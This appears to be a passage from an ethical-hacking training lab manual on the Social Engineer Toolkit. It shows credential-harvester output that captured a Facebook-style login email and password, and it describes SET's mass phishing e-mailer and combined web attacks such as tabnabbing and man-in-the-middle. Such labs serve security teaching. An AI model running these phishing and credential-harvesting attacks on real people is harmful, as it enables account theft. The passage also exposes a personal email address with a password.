PARAM: default_persistent=0
POSSIBLE USERNAME FIELD FOUND: login=Log+In
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

FIGURE 3.17: SET found Username and Password

22. Press CTRL+C to generate a report for this attack.

PARAM: lsd=AVqgmkGh
PARAM: return_session=0
PARAM: legacy_return=1
PARAM: display=
PARAM: session_key_only=0
PARAM: trynum=1
PARAM: charset_test=€,´,€,´,
PARAM: timezone=-540
PARAM: lgnrnd=224034_ArYA
PARAM: lgnjs=n
POSSIBLE USERNAME FIELD FOUND: email=[unreadable in screenshot]
POSSIBLE PASSWORD FIELD FOUND: pass=test
PARAM: default_persistent=0
POSSIBLE USERNAME FIELD FOUND: login=Log+In
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
^C
[*] File exported to reports/2012-09-26 15:49:15.[...].html for your reading pleasure...
[*] File in XML format exported to reports/2012-09-26 15:49:15.[...].xml for your reading pleasure...

Press <return> to continue

FIGURE 3.18: Generating Reports through SET

Lab Analysis

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer; the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list.

The multi-attack will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.

Analyze and document the results related to the lab exercise.


Tool/Utility                  Information Collected/Objectives Achieved

Social Engineering Toolkit    PARAM: lsd=AVqgmkGh
                              PARAM: return_session=0
                              PARAM: legacy_return=1
                              PARAM: display=
                              PARAM: session_key_only=0
                              PARAM: trynum=1
                              PARAM: charset_test=€,´,€,´,
                              PARAM: timezone=-540
                              PARAM: lgnrnd=224034_ArYA
                              PARAM: lgnjs=n
                              email=samchoang@yahoo.com
                              pass=test@123

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Evaluate each of the following Paros proxy options:

a. Trap Request

b. Trap Response

c. Continue button

d. Drop button

Internet Connection Required

☑ Yes ☐ No

Platform Supported

☑ Classroom ☐ iLabs
